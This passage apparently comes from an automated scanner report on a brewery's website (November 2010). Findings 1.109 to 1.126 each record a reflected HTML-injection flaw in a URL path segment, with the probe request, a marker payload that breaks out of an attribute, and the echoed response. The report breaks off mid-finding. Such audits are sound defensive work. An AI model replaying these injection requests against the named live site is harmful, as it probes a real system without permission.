Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentcff1c"><a>27664a239f7_page" class="contentcff1c">
...[SNIP]...

1.109. http://www.ninkasibrewing.com/content/js/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/js/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21677"><a>0ffcc0b4ab4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content21677"><a>0ffcc0b4ab4/js/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content21677"><a>0ffcc0b4ab4_page" class="content21677">
...[SNIP]...

1.110. http://www.ninkasibrewing.com/content/js/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/js/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 703df"><a>def2f74c18c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content703df"><a>def2f74c18c/js/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content703df"><a>def2f74c18c_page" class="content703df">
...[SNIP]...

1.111. http://www.ninkasibrewing.com/content/js/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/js/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75f69"><a>6334a4eb341 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content75f69"><a>6334a4eb341/js/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content75f69"><a>6334a4eb341_page" class="content75f69">
...[SNIP]...

1.112. http://www.ninkasibrewing.com/dock_sales/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/dock_sales/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 105ab"><a>d599d76d4e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales105ab"><a>d599d76d4e6/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="dock_sales105ab"><a>d599d76d4e6_page" class="dock_sales105ab">
...[SNIP]...

1.113. http://www.ninkasibrewing.com/dock_sales/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/dock_sales/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd31"><a>f3a63f771b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales6fd31"><a>f3a63f771b0/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="dock_sales6fd31"><a>f3a63f771b0_page" class="dock_sales6fd31">
...[SNIP]...

1.114. http://www.ninkasibrewing.com/dock_sales/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/dock_sales/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6149e"><a>8921298afbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales6149e"><a>8921298afbf/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="dock_sales6149e"><a>8921298afbf_page" class="dock_sales6149e">
...[SNIP]...

1.115. http://www.ninkasibrewing.com/dock_sales/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/dock_sales/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d6e"><a>dd2ead7ff0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_salesa1d6e"><a>dd2ead7ff0c/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="dock_salesa1d6e"><a>dd2ead7ff0c_page" class="dock_salesa1d6e">
...[SNIP]...

1.116. http://www.ninkasibrewing.com/dock_sales/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/dock_sales/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8fe0"><a>4f3395768f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_salesa8fe0"><a>4f3395768f5/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="dock_salesa8fe0"><a>4f3395768f5_page" class="dock_salesa8fe0">
...[SNIP]...

1.117. http://www.ninkasibrewing.com/dock_sales/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/dock_sales/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62f54"><a>08505ab97bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales62f54"><a>08505ab97bb/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="dock_sales62f54"><a>08505ab97bb_page" class="dock_sales62f54">
...[SNIP]...

1.118. http://www.ninkasibrewing.com/dock_sales/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/dock_sales/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d7cc"><a>edb42030abb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales2d7cc"><a>edb42030abb/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="dock_sales2d7cc"><a>edb42030abb_page" class="dock_sales2d7cc">
...[SNIP]...

1.119. http://www.ninkasibrewing.com/etc/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/etc/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac883"><a>11e27ca78ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etcac883"><a>11e27ca78ba/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="etcac883"><a>11e27ca78ba_page" class="etcac883">
...[SNIP]...

1.120. http://www.ninkasibrewing.com/etc/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/etc/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d715"><a>980bc464eba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etc6d715"><a>980bc464eba/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="etc6d715"><a>980bc464eba_page" class="etc6d715">
...[SNIP]...

1.121. http://www.ninkasibrewing.com/etc/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/etc/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92a18"><a>2377f254faf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etc92a18"><a>2377f254faf/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="etc92a18"><a>2377f254faf_page" class="etc92a18">
...[SNIP]...

1.122. http://www.ninkasibrewing.com/etc/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/etc/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e31"><a>0c94de8f97e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etcf2e31"><a>0c94de8f97e/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="etcf2e31"><a>0c94de8f97e_page" class="etcf2e31">
...[SNIP]...

1.123. http://www.ninkasibrewing.com/etc/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/etc/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 739ca"><a>0576c1b8f9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etc739ca"><a>0576c1b8f9a/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="etc739ca"><a>0576c1b8f9a_page" class="etc739ca">
...[SNIP]...

1.124. http://www.ninkasibrewing.com/etc/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/etc/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a787d"><a>f50a6829e24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etca787d"><a>f50a6829e24/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="etca787d"><a>f50a6829e24_page" class="etca787d">
...[SNIP]...

1.125. http://www.ninkasibrewing.com/etc/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/etc/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba87c"><a>6ea40b41fee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etcba87c"><a>6ea40b41fee/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="etcba87c"><a>6ea40b41fee_page" class="etcba87c">
...[SNIP]...

1.126. http://www.ninkasibrewing.com/facebook/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c518f"><a>4156b07e886 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookc518f"><a>4156b07e886/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:48 GMT
Server: Apache
